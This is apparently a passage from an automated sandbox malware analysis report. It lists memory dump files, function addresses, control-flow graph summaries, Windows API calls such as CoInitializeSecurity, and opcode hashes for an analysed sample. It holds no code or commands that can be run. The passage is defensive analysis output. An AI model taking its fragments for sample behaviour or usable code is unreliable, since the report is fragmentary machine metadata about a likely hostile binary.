                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ab0e84ee62cfb73ad510f0304ca7308bc334f4c315b4396d4c2e106bf802a7d3
                                                                                                                        • Instruction ID: bf247d4b1f0e18bcb1f05c3fdb245c579d4e26483cb7fea15d1b2e99ddf53fb2
                                                                                                                        • Opcode Fuzzy Hash: ab0e84ee62cfb73ad510f0304ca7308bc334f4c315b4396d4c2e106bf802a7d3
                                                                                                                        • Instruction Fuzzy Hash: 8D213CB490021A9FEB15CF94CC90BBFBBB6FB4A304F144859E811BB391C775A911CB64
                                                                                                                        Function 00693220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 340 693220-69322f 341 6932ac-6932b0 340->341 342 6932a0 340->342 343 6932a2-6932a6 RtlFreeHeap 340->343 344 693236-693252 340->344 342->343 343->341 345 693254 344->345 346 693286-693296 344->346 347 693260-693284 call 695af0 345->347 346->342 347->346
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000), ref: 006932A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: db1466a5649a0b3300d77f0f30d2fd81fd85e937419786a50323369d7c361025
                                                                                                                        • Instruction ID: d77c695ae23af51055d2972c7ddd9c8c65102492d3d89da7c10bd2d80816d882
                                                                                                                        • Opcode Fuzzy Hash: db1466a5649a0b3300d77f0f30d2fd81fd85e937419786a50323369d7c361025
                                                                                                                        • Instruction Fuzzy Hash: 90016D3450D2509BCB01EF18E845A1ABBE9EF4A700F05481CE5C58B761D335ED60DB96
                                                                                                                        Function 00695BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 350 695bb0-695be2 LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(006998C0,005C003F,00000002,00000018,?), ref: 00695BDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                        Function 00662F6F Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 351 662f6f-662f87 CoInitializeSecurity
                                                                                                                        APIs
                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00662F82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeSecurity
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 640775948-0
                                                                                                                        • Opcode ID: 3d3f5d9fbe1a885890014959d0fccecad6729fc6e92ec8d25004a99a8499d972
                                                                                                                        • Instruction ID: 0203c963a906cc523d20449989329331f541b8e3a9cbfc997bedf993e8d6ae3a
                                                                                                                        • Opcode Fuzzy Hash: 3d3f5d9fbe1a885890014959d0fccecad6729fc6e92ec8d25004a99a8499d972
                                                                                                                        • Instruction Fuzzy Hash: A7C092313D8706F0F1340A086C23F1522085302F20F701B11B334BC5D08CD03102800D
                                                                                                                        Function 00662F10 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 379 662f10-662f65 CoInitialize
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00662F60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
